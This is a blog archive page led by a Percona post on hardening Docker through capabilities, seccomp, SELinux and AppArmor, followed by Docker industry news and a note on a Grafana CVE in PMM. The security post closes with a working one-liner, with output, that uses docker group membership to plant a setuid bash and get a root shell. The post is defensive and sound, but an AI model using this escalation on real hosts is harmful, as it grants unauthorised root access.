Jul
11
2019
--

Docker Security Considerations Part I

Docker security

Docker securityDocker Security Considerations – PART I

Why Docker Security Matters

It is a fact that Docker has found widespread use during the past years, mostly because it is very easy to use as well as fast and easy to deploy when compared with a full-blown virtual machine. More and more servers are being operated as Docker hosts on which micro-services run in containers. From a security point of view, two aspects of it arise in the context of this blog post and the inherent limitations it has as a means of communication.

First, the answer to the already quite talked-through question, “Is it secure?” Second, the less analyzed aspect of incident analysis, and the changes introduced with respect to known methods and evidence. In order to answer the first question, some key facts about Docker need to be noted. The second aspect, being less examined in general, will be a future post in this mini-series about Docker security.

The basic technology that enables containers in Linux is kernel name-spaces. These are what allow the kernel to offer private resources to a process, while hiding the resources of other processes, all without actually creating full guest OSes or kernels per process. One very important fact is that containers run without cgroup limitations by default, but CPU and memory usage can be easily constrained with the application of a few flags. Docker presents an option called cgroup-parent for this purpose, and you can check the official docker documentation on cgroup-parent. Under no circumstances should containers (or any process) be allowed to run on a production server without such cgroup limitations. In addition, predefined resource consumption for containers could help in limiting the costs for cloud infrastructure as it better defines them, leading to more targeted purchases.

Docker uses a default profile to create a system call whitelist. In this profile, “dangerous” syscalls are missing. If you have a solid understanding of exactly the system calls needed by your containerized process, you can customize this profile or write your own to lock out every syscall not needed by your container. Also, note that custom profiles can be applied on a container-by-container basis. In addition, Linux capabilities can be a very good way with regards to considerations on Docker security. Quoting from the man-pages:

For the purpose of performing permission checks, traditional UNIX implementations distinguish two categories of processes: privileged processes (whose effective user ID is 0, referred to as superuser or root), and unprivileged processes (whose effective UID is nonzero). Privileged processes bypass all kernel permission checks, while unprivileged processes are subject to full permission checking based on the process’s credentials (usually: effective UID, effective GID, and supplementary group list).

Starting with kernel 2.2, Linux divides the privileges traditionally associated with superuser into distinct units, known as capabilities, which can be independently enabled and disabled.  Capabilities are a per-thread attribute.

In the example below, we can see the basic syntax for manipulating and auditing capabilities. Perhaps the most secure way to run Docker is using the –user flag (no capabilities), but this is not always possible since there is no way to add capabilities to a nonzero UID. In cases where this is needed, running as root with –cap-drop ALL and –cap-add to add back the minimum set of capabilities is the most secure practical configuration. Note that since a Docker container is fundamentally just a process, it’s simple to enforce these permissions at runtime using the native Linux functionality designed to manage capabilities per process. No ‘under-the-hood’ configuration inside the container is required, but it would be to manipulate the capabilities of groups of processes running in a VM.

A closer look at these should highlight the need to manage them and will give us a better understanding of what’s going on. The default list of capabilities available to privileged processes in a docker container (mostly quoting https://www.redhat.com/en/blog/secure-your-containers-one-weird-trick) is presented below. A complete list of capabilities can be found at the following link http://man7.org/linux/man-pages/man7/capabilities.7.html. At this point we should note that in Dockerfile v3 and above, capabilities can be added and images built; e.g.

cap_drop:

- ALL

cap_add:

- chown

The default list of capabilities available in a Docker container:

chown:

This is described as the ability to make arbitrary changes to file UIDs and GIDs. Unless a shell is running inside a container and packages installed into it, this should be dropped. If chown is needed, allow it, do the work, and then drop it again.

dac_override:

(Discretionary access control)_override.

Man pages state that this cap allows root to bypass file r, w & x permissions. It is as odd as it sounds, that any app will need this. As noted by RedHat sec experts “nothing should need this. If your container needs this, it probably doing something horrible.”

fowner:

fowner transfers the ability to bypass permission checks on operations that normally require the file system UID to match the UID of the file. Quite similar to dac_overide. Could be needed for docker build but it should be dropped when the container is in production.

fsetid:

Quoting the man page “don’t clear set-user-ID and set-group-ID mode bits when a file is modified; set the set-group-ID bit for a file whose GID does not match the file system or any of the supplementary GIDs of the calling process.”

So, if you are not running an installation, you probably do not need this capability.

kill

This capability basically means that a root-owned process can send kill signals to non-root processes. If your container is running all processes as root or the root processes never kills processes running as non-root, you do not need this capability. If you are running systemd as PID 1 inside of a container, and you want to stop a container running with a different UID, you might need this capability.

setgid

In short, a process with this capability can change its GID to any other GID. Basically allows full group access to all files on the system. If your container processes do not change UIDs/GIDs, they do not need this capability.

setuid

A process with this capability can change its UID to any other UID. Basically, it allows full access to all files on the system. If your container processes do not change UIDs/GIDs always running as the same UID, preferably non-root, they do not need this capability. Applications that need setuid usually start as root in order to bind to ports below 1024 and then change their UIDS and drop capabilities. Apache binding to port 80 requires net_bind_service, usually starting as root. It then needs setuid/setgid to switch to the apache user and drop capabilities. Most containers can safely drop setuid/setgid capability.

setpcap

From the man page description: “Add any capability from the calling thread’s bounding set to its inheritable set; drop capabilities from the bounding set (via prctl(2) PR_CAPBSET_DROP); make changes to the securebits flags.”

A process with this capability can change its current capability set within its bounding set. Meaning a process could drop capabilities or add capabilities if it did not currently have them, but is limited by the bounding set capabilities.

net_bind_service

If you have this capability, you can bind to privileged ports (< 1024).

When binding to a port below 1024 is needed, this capability will do the job. For services that listen to a port above 1024, this capability should be dropped. The risk of this capability is a rogue process interpreting a service like sshd, and collecting user passwords. Running a container in a different network namespace reduces the risk of this capability. It would be difficult for the container process to get to the public network interface

net_raw

This access allows a process to spy on packets on its network. Most container processes would not need this access so it probably should be dropped. Note this would only affect the containers that share the same network that your container process is running on, usually preventing access to the real network. RAW sockets also give an attacker the ability to inject almost anything onto the network.

sys_chroot

This capability allows the use of chroot(). In other words, it allows your processes to chroot into a different rootfs. chroot is probably not used within your container, so it should be dropped.

mknod

If you have this capability, you can create special files using mknod.

This allows your processes to create device nodes. Containers are usually provided all of the device nodes they need in /dev, so this could and should be dropped by default. Almost no containers ever do this, and even fewer containers should do this.

audit_write

With this capability, you can write a message to the kernel auditing log. Few processes attempt to write to the audit log (login programs, su, sudo) and processes inside of the container are probably not trusted. The audit subsystem is not currently namespace-aware, so this should be dropped by default.

setfcap

Finally, the setfcap capability allows you to set file capabilities on a file system. Might be needed for doing installs during builds, but in production, it should probably be dropped.

The following exercise, the output of which is displayed below, should highlight the way of manipulating capabilities along with some of the points made above.

First, we run a container that changes ownership of the root fs:

Status: Image is up to date for centos:latest
john@seceng:~/Documents/docker-sec$
john@seceng:~/Documents/docker-sec$ docker container run --rm centos:latest chown nobody /
john@seceng:~/Documents/docker-sec$

We can see that the root user is able to execute this without a problem.

Next, we drop all capabilities from the user in the container, and when we try running the above command again, we can see it fails, as the user no longer has the necessary chown capability (or any other root capabilities):

john@seceng:~/Documents/docker-sec$ docker container run --rm --cap-drop all centos:latest chown nobody /
chown: changing ownership of '/': Operation not permitted
john@seceng:~/Documents/docker-sec$

Now we add the necessary capability back in:

john@seceng:~/Documents/docker-sec$ docker container run --rm --cap-drop all --cap-add chown centos:latest chown nobody /
john@seceng:~/Documents/docker-sec$

Dropping all capabilities and adding back only the required ones makes for the most secure containers. An attacker who breaches this container won’t have any root capabilities except chown.

Now, if we try adding chown to a non-root user, the operation fails since capabilities manipulation won’t grant additional capabilities under any circumstances to a process run by a non-root user, as noted on the following screenshot.

john@seceng:~/Documents/docker-sec$ docker container run --rm --user 1000:1000 --cap-add chown centos:latest chown nobody /
chown: changing ownership of '/': Operation not permitted
john@seceng:~/Documents/docker-sec$

Another Linux feature that can aid the process of securing our containers is Secure computing mode (seccomp). Seccomp is a Linux kernel feature. You can use it to restrict the actions available within the container. The seccomp() system call operates on the seccomp state of the calling process. You can use this feature to restrict your application’s access.

This feature is available only if Docker has been built with seccomp and the kernel is configured with CONFIG_SECCOMP enabled. More info about the seccomp profiles for Docker can be found here. To check if your kernel supports seccomp:

john@seceng:~/Documents/docker-sec$ grep CONFIG_SECCOMP= /boot/config-$(uname -r)
CONFIG_SECCOMP=y
john@seceng:~/Documents/docker-sec$

While capabilities and seccomp allow restricting access to root capabilities and system calls, SELinux goes a step further and helps protect the file system of the host from malicious code. Default SELinux labels restrict access to directories and those labels can be changed by the :z and :Z flags when mounting directories to relabel those directories for sharing or private use by containers, respectively.

Additionally, AppArmor (Application Armor) is a Linux security module that protects an operating system and its applications from security threats. To use it, a system administrator associates an AppArmor security profile with each program. Docker expects to find an AppArmor policy loaded and enforced. Docker automatically generates and loads a default profile for containers named docker-default. On Docker versions 1.13.0 and later, the Docker binary generates this profile in tmpfs and then loads it into the kernel. On Docker versions earlier than 1.13.0, this profile is generated in /etc/apparmor.d/docker instead. It should be noted, though, that this profile is used on containers, not on the Docker daemon. More on AppArmor and Docker can be found at docker’s official documentation.

Last in this list of facts, but certainly not in general, is the default software-defined network firewalling imposed by Docker, and the iptables rules automatically managed by Docker. The Docker Networking Model was designed around software-defined networks exactly so that Docker could easily manage iptables firewall rules on create and destroy operations of Docker networks and containers. Rather than writing complicated iptables rules explicitly, effective firewalling can be imposed on a containerized data center simply by designing and declaring a sensible software-defined network topology.

Basically, but for sure not limited to, Docker Security considerations rise because the Docker daemon runs as root and is being used widely in production systems. Having said that and taking into account the previously mentioned facts, one can easily understand that configuration, bugs, vulnerabilities or other security issues are of high risk and impact factor. With this in mind, the following example, which highlights the non-secure default configuration of Docker, is probably the best “teaser” for the next part of this post, in which we will cover some recent vulnerabilities and their mitigation.

john@seceng:~/Documents/docker-sec$ id

uid=1000(john) gid=1000(john) groups=1000(john),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),998(docker)
john@seceng:~/Documents/docker-sec$ whoami

john
john@seceng:~/Documents/docker-sec$ docker run -v /home/${user}:/h_docs ubuntu bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;" && ~/rootshell -p

rootshell-4.4# id
uid=1000(john) gid=1000(john) euid=0(root) groups=1000(john),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),998(docker)
rootshell-4.4# whoami

root
rootshell-4.4# uname -a

Linux seceng 4.19.0-5-amd64 #1 SMP Debian 4.19.37-5 (2019-06-19) x86_64 GNU/Linux
rootshell-4.4# exit

exit
john@seceng:~/Documents/docker-sec$

 

From user to root, in one line. It’s there by default.

John Lionis, Security Engineer | Percona LLC

Written by in: Docker,Zend Developer | Tags:
May
21
2019
--

Microsoft makes a push for service mesh interoperability

Services meshes. They are the hot new thing in the cloud native computing world. At KubeCon, the bi-annual festival of all things cloud native, Microsoft today announced that it is teaming up with a number of companies in this space to create a generic service mesh interface. This will make it easier for developers to adopt the concept without locking them into a specific technology.

In a world where the number of network endpoints continues to increase as developers launch new micro-services, containers and other systems at a rapid clip, they are making the network smarter again by handling encryption, traffic management and other functions so that the actual applications don’t have to worry about that. With a number of competing service mesh technologies, though, including the likes of Istio and Linkerd, developers currently have to choose which one of these to support.

“I’m really thrilled to see that we were able to pull together a pretty broad consortium of folks from across the industry to help us drive some interoperability in the service mesh space,” Gabe Monroy, Microsoft’s lead product manager for containers and the former CTO of Deis, told me. “This is obviously hot technology — and for good reasons. The cloud-native ecosystem is driving the need for smarter networks and smarter pipes and service mesh technology provides answers.”

The partners here include Buoyant, HashiCorp, Solo.io, Red Hat, AspenMesh, Weaveworks, Docker, Rancher, Pivotal, Kinvolk and VMware . That’s a pretty broad coalition, though it notably doesn’t include cloud heavyweights like Google, the company behind Istio, and AWS.

“In a rapidly evolving ecosystem, having a set of common standards is critical to preserving the best possible end-user experience,” said Idit Levine, founder and CEO of Solo.io. “This was the vision behind SuperGloo — to create an abstraction layer for consistency across different meshes, which led us to the release of Service Mesh Hub last week. We are excited to see service mesh adoption evolve into an industry-level initiative with the SMI specification.”

For the time being, the interoperability features focus on traffic policy, telemetry and traffic management. Monroy argues that these are the most pressing problems right now. He also stressed that this common interface still allows the different service mesh tools to innovate and that developers can always work directly with their APIs when needed. He also stressed that the Service Mesh Interface (SMI), as this new specification is called, does not provide any of its own implementations of these features. It only defines a common set of APIs.

Currently, the most well-known service mesh is probably Istio, which Google, IBM and Lyft launched about two years ago. SMI may just bring a bit more competition to this market since it will allow developers to bet on the overall idea of a service mesh instead of a specific implementation.

In addition to SMI, Microsoft also today announced a couple of other updates around its cloud-native and Kubernetes services. It announced the first alpha of the Helm 3 package manager, for example, as well as the 1.0 release of its Kubernetes extension for Visual Studio Code and the general availability of its AKS virtual nodes, using the open source Virtual Kubelet project.

May
08
2019
--

Steve Singh stepping down as Docker CEO

TechCrunch has learned that Docker CEO Steve Singh will be stepping down after two years at the helm, and former Hortonworks CEO Rob Bearden will be taking over. An email announcement went out this morning to Docker employees.

People close to the company confirmed that Singh will be leaving the CEO position, staying on the job for several months to help Bearden with the transition. He will then remain with the organization in his role as chairman of the board. They indicated that Bearden has been working closely with Singh over the last several months as a candidate to join the board and as a consultant to the executive team.

Singh clicked with him and viewed him as a possible successor, especially given his background with leadership positions at several open-source companies, including taking Hortonworks public before selling to Cloudera last year. Singh apparently saw someone who could take the company to the next level as he moved on. As one person put it, he was tired of working 75 hours a week, but he wanted to leave the company in the hands of a capable steward.

Last week in an interview at DockerCon, the company’s annual customer conference in San Francisco, Singh appeared tired, but a leader who was confident in his position and who saw a bright future for his company. He spoke openly about his leadership philosophy and his efforts to lift the company from the doldrums it was in when he took over two years prior, helping transform it from a mostly free open-source offering into a revenue-generating company with 750 paying enterprise customers.

In fact, he told me that under his leadership the company was on track to become free cash flow positive by the end of this fiscal year, a step he said would mean that Docker would no longer need to seek outside capital. He even talked of the company eventually going public.

Apparently, he felt it was time to pass the torch before the company took those steps, saw a suitable successor in Bearden and offered him the position. While it might have made more sense to announce this at DockerCon with the spotlight focused on the company, it was not a done deal yet by the time the conference was underway in San Francisco, people close to the company explained.

Docker took a $92 million investment last year, which some saw as a sign of continuing struggles for the company, but Singh said he took the money to continue to invest in building revenue-generating enterprise products, some of which were announced at DockerCon last week. He indicated that the company would likely not require any additional investment moving forward.

As for Bearden, he is an experienced executive with a history of successful exits. In addition to his experience at Hortonworks, he was COO at SpringSource, a developer tool suite that was sold to VMware for $420 million in 2009 (and is now part of Pivotal). He was also COO at JBoss, an open-source middleware company acquired by Red Hat in 2006.

Whether he will do the same with Docker remains to be seen, but as the new CEO, it will be up to him to guide the company moving forward to the next steps in its evolution, whether that eventually results in a sale or the IPO that Singh alluded to.

Email to staff from Steve Singh:

Note: Docker has now confirmed this story in a press release.

Apr
30
2019
--

Docker looks to partners and packages to ease container implementation

Docker appears to be searching for ways to simplify the core value proposition of the company — creating, deploying and managing containers. While most would agree it has revolutionized software development, like many technology solutions, it takes a certain level of expertise and staffing to pull off. At DockerCon, the company’s customer conference taking place this week in San Francisco, Docker announced several ways it could help customers with the tough parts of implementing a containerized solution.

For starters, the company announced a beta of Docker Enterprise 3.0 this morning. That update is all about making life simpler for developers. As companies move to containerized environments, it’s a challenge for all but the largest organizations like Google, Amazon and Facebook, all of whom have massive resource requirements and correspondingly large engineering teams.

Most companies don’t have that luxury though, and Docker recognizes if it wants to bring containerization to a larger number of customers, it has to create packages and programs that make it easier to implement.

Docker Enterprise 3.0 is a step toward providing a solution that lets developers concentrate on the development aspects, while working with templates and other tools to simplify the deployment and management side of things.

The company sees customers struggling with implementation and how to configure and build a containerized workflow, so it is working with systems integrators to help smooth out the difficult parts. Today, the company announced Docker Enterprise as a Service, with the goal of helping companies through the process of setting up and managing a containerized environment, using the Docker stack and adjacent tooling like Kubernetes.

The service provider will take care of operational details like managing upgrades, rolling out patches, doing backups and undertaking capacity planning — all of those operational tasks that require a high level of knowledge around enterprise container stacks.

Capgemini will be the first go-to-market partner. “Capgemini has a combination of automation, technology tools, as well as services on the back end that can manage the installation, provisioning and management of the enterprise platform itself in cases where customers don’t want to do that, and they want to pay someone to do that for them,” Scott Johnston, chief product officer at Docker told TechCrunch.

The company has released tools in the past to help customers move legacy applications into containers without a lot of fuss. Today, the company announced a solution bundle called Accelerate Greenfield, a set of tools designed to help customers get up and running as container-first development companies.

“This is for those organizations that may be a little further along. They’ve gone all-in on containers committing to taking a container-first approach to new application development,” Johnston explained. He says this could be cloud native microservices or even a LAMP stack application, but the point is that they want to put everything in containers on a container platform.

Accelerate Greenfield is designed to do that. “They get the benefits where they know that from the developer to the production end point, it’s secure. They have a single way to define it all the way through the life cycle. They can make sure that it’s moving quickly, and they have that portability built into the container format, so they can deploy [wherever they wish],” he said.

These programs and products are all about providing a level of hand-holding, either by playing a direct consultative role, working with a systems integrator or providing a set of tools and technologies to walk the customer through the containerization life cycle. Whether they provide a sufficient level of help that customers require is something we will learn over time as these programs mature.

Apr
30
2019
--

Docker updates focus on simplifying containerization for developers

Over the last five years, Docker has become synonymous with software containers, but that doesn’t mean every developer understands the technical details of building, managing and deploying them. At DockerCon this week, the company’s customer conference taking place in San Francisco, it announced new tools that have been designed to make it easier for developers, who might not be Docker experts, to work with containers.

As the technology has matured, the company has seen the market broaden, but in order to take advantage of that, it needs to provide a set of tools that make it easier to work with. “We’ve found that customers typically have a small cadre of Docker experts, but there are hundreds, if not thousands, of developers who also want to use Docker. And we reasoned, how can we help them get productive very, very quickly, without them having to become Docker experts,” Scott Johnston, chief product officer at Docker, told TechCrunch.

To that end, it announced a beta of Docker Enterprise 3.0, which includes several key components. For starters, Docker Desktop Enterprise lets IT set up a Docker environment with the kind of security and deployment templates that make sense for each customer. The developers can then pick the templates that make sense for their implementations, while conforming with compliance and governance rules in the company.

“These templates already have IT-approved container images, and have IT-approved configuration settings. And what that means is that IT can provide these templates through these visual tools that allow developers to move fast and choose the ones they want without having go back for approval,” Johnston explained.

The idea is to let the developers concentrate on building applications, and the templates provide all the Docker tooling pre-built and ready to go, so they don’t have to worry about all of that.

Another piece of this is Docker Applications, which allows developers to build complex containerized applications as a single package and deploy them to any infrastructure they wish — on-prem or in the cloud. Five years ago, when Docker really got started with containers, they were a simpler idea, often involving just a single one, but as developers broke down those larger applications into microservices, it created a new level of difficulty, especially for operations that had to deploy these increasingly large sets of application containers.

“Operations can now programmatically change the parameters for the containers, depending on the environments, without having to go in and change the application. So you can imagine that ability lowers the friction of having to manage all these files in the first place,” he said.

The final piece of that is the orchestration layer, and the popular way to handle that today is with Kubernetes. Docker has created its own flavor of Kubernetes, based on the open-source tool. Johnston says, as with the other two pieces, the goal here is to take a powerful tool like Kubernetes and reduce the overall complexity associated with running it, while making it fully compatible with a Docker environment.

For that, Docker announced Docker Kubernetes Service (DKS), which has been designed with Docker users in mind, including support for Docker Compose, a scripting tool that has been popular with Docker users. While you are free to use any flavor of Kubernetes you wish, Docker is offering DKS as a Docker-friendly version for developers.

All of these components have one thing in common besides being part of Docker Enterprise 3.0. They are trying to reduce the complexity associated with deploying and managing containers and to abstract away the most difficult parts, so that developers can concentrate on developing without having to worry about connecting to the technical underpinnings of building and deploying containers. At the same time, Docker is trying to make it easier for the operations team to manage it all. That is the goal, at least. In the end, DevOps teams will be the final judges of how well Docker has done, once these tools become generally available later this year.

The Docker Enterprise 3.0 beta will be available later this quarter.

Apr
24
2019
--

Docker developers can now build Arm containers on their desktops

Docker and Arm today announced a major new partnership that will see the two companies collaborate in bringing improved support for the Arm platform to Docker’s tools.

The main idea here is to make it easy for Docker developers to build their applications for the Arm platform right from their x86 desktops and then deploy them to the cloud (including the Arm-based AWS EC2 A1 instances), edge and IoT devices. Developers will be able to build their containers for Arm just like they do today, without the need for any cross-compilation.

This new capability, which will work for applications written in JavaScript/Node.js, Python, Java, C++, Ruby, .NET core, Go, Rust and PHP, will become available as a tech preview next week, when Docker hosts its annual North American developer conference in San Francisco.

Typically, developers would have to build the containers they want to run on the Arm platform on an Arm-based server. With this system, which is the first result of this new partnership, Docker essentially emulates an Arm chip on the PC for building these images.

“Overnight, the 2 million Docker developers that are out there can use the Docker commands they already know and become Arm developers,” Docker EVP of Strategic Alliances David Messina told me. “Docker, just like we’ve done many times over, has simplified and streamlined processes and made them simpler and accessible to developers. And in this case, we’re making x86 developers on their laptops Arm developers overnight.”

Given that cloud-based Arm servers like Amazon’s A1 instances are often significantly cheaper than x86 machines, users can achieve some immediate cost benefits by using this new system and running their containers on Arm.

For Docker, this partnership opens up new opportunities, especially in areas where Arm chips are already strong, including edge and IoT scenarios. Arm, similarly, is interested in strengthening its developer ecosystem by making it easier to develop for its platform. The easier it is to build apps for the platform, the more likely developers are to then run them on servers that feature chips from Arm’s partners.

“Arm’s perspective on the infrastructure really spans all the way from the endpoint, all the way through the edge to the cloud data center, because we are one of the few companies that have a presence all the way through that entire path,” Mohamed Awad, Arm’s VP of Marketing, Infrastructure Line of Business, said. “It’s that perspective that drove us to make sure that we engage Docker in a meaningful way and have a meaningful relationship with them. We are seeing compute and the infrastructure sort of transforming itself right now from the old model of centralized compute, general purpose architecture, to a more distributed and more heterogeneous compute system.”

Developers, however, Awad rightly noted, don’t want to have to deal with this complexity, yet they also increasingly need to ensure that their applications run on a wide variety of platforms and that they can move them around as needed. “For us, this is about enabling developers and freeing them from lock-in on any particular area and allowing them to choose the right compute for the right job that is the most efficient for them,” Awad said.

Messina noted that the promise of Docker has long been to remove the dependence of applications from the infrastructure on which they run. Adding Arm support simply extends this promise to an additional platform. He also stressed that the work on this was driven by the company’s enterprise customers. These are the users who have already set up their systems for cloud-native development with Docker’s tools — at least for their x86 development. Those customers are now looking at developing for their edge devices, too, and that often means developing for Arm-based devices.

Awad and Messina both stressed that developers really don’t have to learn anything new to make this work. All of the usual Docker commands will just work.

Dec
04
2018
--

Microsoft and Docker team up to make packaging and running cloud-native applications easier

Microsoft and Docker today announced a new joint open-source project, the Cloud Native Application Bundle (CNAB), that aims to make the lifecycle management of cloud-native applications easier. At its core, the CNAB is nothing but a specification that allows developers to declare how an application should be packaged and run. With this, developers can define their resources and then deploy the application to anything from their local workstation to public clouds.

The specification was born inside Microsoft, but as the team talked to Docker, it turns out that the engineers there were working on a similar project. The two decided to combine forces and launch the result as a single open-source project. “About a year ago, we realized we’re both working on the same thing,” Microsoft’s Gabe Monroy told me. “We decided to combine forces and bring it together as an industry standard.”

As part of this, Microsoft is launching its own reference implementation of a CNAB client today. Duffle, as it’s called, allows users to perform all the usual lifecycle steps (install, upgrade, uninstall), create new CNAB bundles and sign them cryptographically. Docker is working on integrating CNAB into its own tools, too.

Microsoft also today launched Visual Studio extension for building and hosting these bundles, as well as an example implementation of a bundle repository server and an Electron installer that lets you install a bundle with the help of a GUI.

Now it’s worth noting that we’re talking about a specification and reference implementations here. There is obviously a huge ecosystem of lifecycle management tools on the market today that all have their own strengths and weaknesses. “We’re not going to be able to unify that tooling,” said Monroy. “I don’t think that’s a feasible goal. But what we can do is we can unify the model around it, specifically the lifecycle management experience as well as the packaging and distribution experience. That’s effectively what Docker has been able to do with the single-workload case.”

Over time, Microsoft and Docker would like for the specification to end up in a vendor-neutral foundation. Which one remains to be seen, though the Open Container Initiative seems like the natural home for a project like this.

Nov
20
2018
--

How CVE-2018-19039 Affects Percona Monitoring and Management

CVE-2018-19039

CVE-2018-19039Grafana Labs has released an important security update, and as you’re aware PMM uses Grafana internally. You’re probably curious whether this issue affects you.  CVE-2018-19039 “File Exfiltration vulnerability Security fix” covers a recently discovered security flaw that allows any Grafana user with Editor or Admin permissions to have read access to the filesystem, performed with the same privileges as the Grafana process has.

We have good news: if you’re running PMM 1.10.0 or later (released April 2018), you’re not affected by this security issue.

The reason you’re not affected is an interesting one. CVE-2018-19039 relates to Grafana component PhantomJS, which Percona omitted when we changed how we build the version of Grafana embedded in Percona Monitoring and Management. We became aware of this via bug PMM-2837 when we discovered images do not render.

We fixed this image rendering issue in and applied the required security update in 1.17. This ensures PMM is not vulnerable to CVE-2018-19039.

Users of PMM who are running release 1.1.0 (February 2017) through 1.9.1 (April 2018) are advised to upgrade ASAP.  If you cannot immediately upgrade, we advise that you take two steps:

  1. Convert all Grafana users to Viewer role
  2. Remove all Dashboards that contain text panels

How to Get PMM Server

PMM is available for installation using three methods:

Nov
15
2018
--

Docker inks partnership with MuleSoft as Salesforce takes a strategic stake

Docker and MuleSoft have announced a broad deal to sell products together and integrate their platforms. As part of it, Docker is getting an investment from Salesforce, the CRM giant that acquired MuleSoft for $6.5 billion last spring.

Salesforce is not disclosing the size of the stake it’s taking in Docker, but it is strategic: it will see its new MuleSoft working with Docker to connect containerized applications to multiple data sources across an organization. Putting the two companies together, you can connect these containerized applications to multiple data sources in a modern way, even with legacy applications.

The partnership is happening on multiple levels and includes technical integration to help customers more easily use the two toolsets together. It also includes a sales agreement to invite each company’s sales team when it makes sense, and to work with systems integrators and ISVs, who help companies put these kind of complex solutions to work inside large organizations.

Docker chief product officer Scott Johnston said it was really about bringing together two companies whose missions were aligned with what they were hearing from customers. That involves tapping into some broad trends around getting more out of their legacy applications and a growing desire to take an API-driven approach to developer productivity, while getting additional value out of their existing data sources. “Both companies have been working separately on these challenges for the last several years, and it just made sense as we listen to the market and listen to customers that we joined forces,” Johnston told TechCrunch.

Uri Sarid, MuleSoft’s CTO, agrees that customers have been using both products and it called for a more formal arrangement. “We have joint customers and the partnership will be fortifying that. So that’s a great motion, but we believe in acceleration. And so if there are things that we can do, and we now have plans for what we will do to make that even faster, to make that even more natural and built-in, we can accelerate the motion to this. Before, you had to think about these two concerns separately, and we are working on interoperability that makes you not have to think about them separately,” he explained.

This announcement comes at a time of massive consolidation in the enterprise. In the last couple of weeks, we have seen IBM buying Red Hat for $34 billion, SAP acquiring Qualtrics for $8 billion and Vista Equity Partners scooping up Apptio for $1.94 billion. Salesforce acquired MuleSoft earlier this year in its own mega deal in an effort to bridge the gap between data in the cloud and on-prem.

The final piece of today’s announcement is that investment from Salesforce Ventures. Johnston would not say how much the investment was for, but did say it was about aligning the two partners.

Docker had raised almost $273 million before today’s announcement. It’s possible it could be looking for a way to exit, and with the trend toward enterprise consolidation, Salesforce’s investment may be a way to test the waters for just that. If it seems like an odd match, remember that Salesforce bought Heroku in 2010 for $212 million.

Powered by WordPress | Theme: Aeros 2.0 by TheBuckmaker.com